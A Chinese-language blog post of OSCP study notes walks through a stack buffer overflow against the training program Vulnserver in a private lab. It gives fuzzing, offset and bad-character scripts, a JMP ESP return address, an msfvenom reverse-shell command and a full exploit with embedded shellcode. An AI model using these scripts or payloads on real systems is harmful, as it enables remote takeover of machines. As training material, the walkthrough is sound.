Buffer Overflows Made Easy 學習筆記(OSCP Preparation)

因為近期開始在準備OSCP認證,那OSCP當中會有一題是Buffer Overflow的。看了許多國內外的OSCP準備心得,對於Buffer Overflow的部分很多人都有推薦要看The Cyber Mentor的Youtube教學影片「Buffer Overflows Made Easy」。前陣子有看完並且跟著做了一遍,覺得真的是教得很好,當下也算是滿順手的,不過也怕時間一久就全部都忘光光,畢竟平常根本會有機會去打Buffer Overflows的漏洞,就算有,也是又別人寫好的現成的exploits之類。所以就筆記下來希望之後可以幫助自己回想學習的過程。

Buffer Overflows Made Easy

影片連結
https://www.youtube.com/watch?v=qSnPayW6F7U&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G

總共分八部影片

Part 1: Introduction

簡單了解一下架構

Spiking
  • Fuzzing
  • Finding the Offset
  • Overwriting the EIP
  • Finding Bad Characters
  • Finding the Right Module
  • Generating Shellcode
  • Root!
  • 需要準備的工具

    1. Victim Machine: Windows 10
    2. Vulnerable Software: Vulnserver
    3. Attacker Machine: Kali Linux
    4. Debugger: Immunity Debugger

    接著就稍微說明一下我的環境建立

    我的攻擊機與受害機接著使用虛擬機(VM)

    http://old.kali.org/kali-images/kali-2019.3/

    兩台虛擬機起好之後,在win10當中下載Vulnserver與Immunity Debugger

    Vulnserver載點:
    https://github.com/stephenbradshaw/vulnserver
    直接用Github下載ZIP檔,解壓縮後執行EXE的檔案就可以了。

    https://www.immunityinc.com/products/debugger/
    直接下載安裝就可,下載前會詢問一些資料,隨便填填就可以,
    安裝前會詢問python 2.7,若沒有的話,繼續安裝,最後它也會幫你安裝好。

    Part 2: Spiking

    右鍵點選vulnserver,使用管理員的權限執行。

    nc -nv 192.168.240.180 9999

    成功的話會顯示如下的畫面,可以輸入HELP查看有甚麼指令。

    s_readline(); s_string("STATS "); s_string_variable("0");

    trun.spk

    s_readline();
    s_string("TRUN ");
    s_string_variable("0");

    執行下面的指令

    generic_send_tcp 192.168.240.180 9999 stats.spk 0 0
    Part 3: Fuzzing

    第二步Fuzzing的用意是我們要知道,要發送多少個字串才會導致Buffer Overflow。

    我們寫一個python的簡易腳本,第一次連線在TRUN指令後發送100個A,
    之後每次連線都在後面多增加100個A,直到程式crash,
    這樣我們就可以知道需要個Buffer才會造成程式Crash。

    1.py

    import sys, socket
    from time import sleep
    
    buf = "A" * 100
    
    while True:
    	try:
    		s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    		s.connect(('192.168.240.180',9999))
    
    		s.send(('TRUN /.:/' + buf))
    		s.close
    		sleep(1)
    		print "Fuzzing now is %s bytes" % str(len(buf))
    		buf = buf + "A"*100
    				
    	except:
    		print "Fuzzing crashed at %s bytes" % str(len(buf))
    		sys.exit()

    接下來我們要找到特定的EIP的位置,
    因為我們要想辦法控制EIP的值,
    所以接下來最重要的就是找到EIP覆蓋的位置。

    Part 4: Finding the Offset

    剛剛有提到我們要找到如何控制EIP,
    所以我們要知道說EIP之前有多少個buffer,
    EIP之前需要多少個buffer,也就是我們所謂的offset。

    因為剛剛測試差不多2700 bytes就會Crash,
    我們利用Kali的內建工具來產生一個周期性的字串,
    幫助我們去找到offset的位置,

    利用以下指令產生3000個字串,

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
    把產生的payload複製下來貼到腳本 2.py

    2.py

    #!/usr/bin/python
    import sys, socket
    
    offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
    
    try:
    	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    	s.connect(('192.168.240.180',9999))
    	s.send(('TRUN /.:/' + offset))
    	s.close
    			
    except:
    	print "Error Connect"
    	sys.exit()

    首先確認程式crash了,debugger的右下角發現程式paused,
    我們來注意一下EIP的值,是386F4337

    /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

    其中-l就是我們剛剛產生的數量 -q是要查詢的內容

    補充一下
    假設產生的payload -l 20,
    所以payload可能會長得如下
    1A2B3C4D5E7Co8654321
    (總共20bytes)

    送出後得到的EIP是386F4337
    總共4bytes
    Hex to ASCII就是8oC7

    offset算出來是10
    表示產生的payload
    扣除前面十個
    第11個開始就會是EIP的位置

    Part 5: Overwriting the EIP

    知道了offset的數量之後,其實我們就有辦法覆蓋EIP的值了,
    這部分就是用3.py,確定一下是有真的覆蓋在EIP上面。
    影片中是用BBBB啦,我的腳本是用BCDE確認有hit中EIP的值。

    3.py

    #!/usr/bin/python
    import sys, socket
    
    shellcode = "A" * 2003 + "BCDE"
    
    try:
    	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    	s.connect(('192.168.240.180',9999))
    	s.send(('TRUN /.:/' + shellcode))
    	s.close
    			
    except:
    	print "Error Connect"
    	sys.exit()
    Part 6: Finding Bad Characters

    下一個步驟是要找到Bad Characters,
    其實為了之後要注入Shellcode做準備,
    我們要看看有哪些字串是這個程式不吃的,
    如果說這個字串不能正常在程式當中執行(也就是Bad Chars),
    我們就要先記下來,避免之後產生的shellcode有這個Bad Chars。

    找到Bad Characters,可以利用一下以下的資源,
    把badchars複製貼上到我們的4.py
    https://github.com/cytopia/badchars

    4.py

    #!/usr/bin/python
    import sys, socket
    
    badchars = (
      "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
      "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
      "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
      "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
      "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
      "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
      "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
      "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
      "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
      "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
      "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
      "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
      "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
      "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
      "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
      "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )
    shellcode = "A" * 2003 + "BCDE" + badchars
    
    try:
    	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    	s.connect(('192.168.240.180',9999))
    	s.send(('TRUN /.:/' + shellcode))
    	s.close
    			
    except:
    	print "Error Connect"
    	sys.exit()

    發送之後,因為badchars的payload在EIP之後,
    點選ESP的值,選擇Follow in Dump,
    可以看到左下角,就會顯示ESP位置內容,
    這一大串就是我們發送過去的badchars的payload。

    Part 7: Finding the Right Module

    接著我們要找到一個Right Module,
    何謂Right Module呢?
    就是一個沒有保護機制的Module,
    我們可以利用mona來協助我們找到,將mona.py放到以下位置。

    C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands

    https://github.com/corelan/mona

    !mona modules

    這邊可以看到第一個essfunc.dll沒有用到任何的保護機制,
    每個保護機制都寫False,正好是我們需要的。

    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    !mona find -s "\xff\xe4" -m essfunc.dll
    5.py

    #!/usr/bin/python
    import sys, socket
    from time import sleep
    
    # FF E4 (JMP ESP) position 625011af
    shellcode = "A" * 2003 + "\xaf\x11\x50\x62"
    
    try:
    	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    	s.connect(('192.168.240.180',9999))
    	s.send(('TRUN /.:/' + shellcode))
    	s.close
    			
    except:
    	print "Error Connect"
    	sys.exit()

    不過要記得執行前先到Debugger,
    在 625011AF 的位置先按F2,就是設定break point,
    不然./5.py執行之後,EIP指到那個位置就會 JMP ESP
    這樣我們沒辦法確定是否有真的將EIP 指到 625011AF。

    Part 8: Generating Shellcode and Gaining Shells

    最後就是我們要在ESP的地方注入Shellcode,
    首先我們要先產生Shellcode,執行以下指令:

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.240.128 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

    IP跟Port記得更換成自己要監聽的IP跟Port。

    nc -nvlp 4444

    執行以下腳本
    6.py

    #!/usr/bin/python
    import sys, socket
    
    overflow = (
    "\xdb\xd3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x52\xbd\xcc\x3d\x38"
    "\xe7\x31\x6f\x17\x03\x6f\x17\x83\x23\xc1\xda\x12\x47\xd2\x99"
    "\xdd\xb7\x23\xfe\x54\x52\x12\x3e\x02\x17\x05\x8e\x40\x75\xaa"
    "\x65\x04\x6d\x39\x0b\x81\x82\x8a\xa6\xf7\xad\x0b\x9a\xc4\xac"
    "\x8f\xe1\x18\x0e\xb1\x29\x6d\x4f\xf6\x54\x9c\x1d\xaf\x13\x33"
    "\xb1\xc4\x6e\x88\x3a\x96\x7f\x88\xdf\x6f\x81\xb9\x4e\xfb\xd8"
    "\x19\x71\x28\x51\x10\x69\x2d\x5c\xea\x02\x85\x2a\xed\xc2\xd7"
    "\xd3\x42\x2b\xd8\x21\x9a\x6c\xdf\xd9\xe9\x84\x23\x67\xea\x53"
    "\x59\xb3\x7f\x47\xf9\x30\x27\xa3\xfb\x95\xbe\x20\xf7\x52\xb4"
    "\x6e\x14\x64\x19\x05\x20\xed\x9c\xc9\xa0\xb5\xba\xcd\xe9\x6e"
    "\xa2\x54\x54\xc0\xdb\x86\x37\xbd\x79\xcd\xda\xaa\xf3\x8c\xb2"
    "\x1f\x3e\x2e\x43\x08\x49\x5d\x71\x97\xe1\xc9\x39\x50\x2c\x0e"
    "\x3d\x4b\x88\x80\xc0\x74\xe9\x89\x06\x20\xb9\xa1\xaf\x49\x52"
    "\x31\x4f\x9c\xf5\x61\xff\x4f\xb6\xd1\xbf\x3f\x5e\x3b\x30\x1f"
    "\x7e\x44\x9a\x08\x15\xbf\x4d\xf7\x42\x4f\x0d\x9f\x90\xaf\x1f"
    "\x3c\x1c\x49\x75\xac\x48\xc2\xe2\x55\xd1\x98\x93\x9a\xcf\xe5"
    "\x94\x11\xfc\x1a\x5a\xd2\x89\x08\x0b\x12\xc4\x72\x9a\x2d\xf2"
    "\x1a\x40\xbf\x99\xda\x0f\xdc\x35\x8d\x58\x12\x4c\x5b\x75\x0d"
    "\xe6\x79\x84\xcb\xc1\x39\x53\x28\xcf\xc0\x16\x14\xeb\xd2\xee"
    "\x95\xb7\x86\xbe\xc3\x61\x70\x79\xba\xc3\x2a\xd3\x11\x8a\xba"
    "\xa2\x59\x0d\xbc\xaa\xb7\xfb\x20\x1a\x6e\xba\x5f\x93\xe6\x4a"
    "\x18\xc9\x96\xb5\xf3\x49\xb6\x57\xd1\xa7\x5f\xce\xb0\x05\x02"
    "\xf1\x6f\x49\x3b\x72\x85\x32\xb8\x6a\xec\x37\x84\x2c\x1d\x4a"
    "\x95\xd8\x21\xf9\x96\xc8"
    )
    shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow
    
    try:
    	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    	s.connect(('192.168.240.180',9999))
    	s.send(('TRUN /.:/' + shellcode))
    	s.close
    			
    except:
    	print "Error Connect"
    	sys.exit()

    腳本中的x90 * 32是為了padding用途,
    成功取得reverse shell。

    Tags: ,

    發佈留言

    Close Menu